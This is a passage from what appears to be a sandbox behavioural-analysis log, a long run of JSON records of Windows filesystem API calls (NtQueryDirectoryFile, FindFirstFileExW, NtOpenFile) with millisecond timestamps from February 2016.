"filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,184", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,194", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,204", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,214", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,224", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,234", "api": "NtQueryDirectoryFile"}, {"category": 